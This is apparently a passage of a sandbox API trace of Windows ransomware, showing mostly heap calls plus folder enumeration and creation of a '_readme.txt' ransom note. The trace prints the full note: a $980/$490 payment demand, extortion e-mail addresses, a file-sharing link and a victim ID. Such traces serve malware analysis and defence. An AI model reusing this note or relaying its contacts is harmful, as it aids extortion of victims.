0x3286300 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.696] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.696] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.697] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.697] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.698] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.698] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.698] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.698] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.698] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.698] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.698] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.698] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.698] PathFindFileNameW (pszPath="") returned="" [0209.698] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.698] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.699] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.699] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.699] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.699] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.699] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.699] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.699] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0209.699] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.700] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.700] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0209.701] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.701] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.701] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.701] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.701] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.702] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.702] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.702] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.702] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.702] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.702] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.702] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.702] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.702] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.702] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.702] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.702] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.702] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.702] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.703] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.703] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.704] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.704] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.705] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.705] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.706] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.706] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, 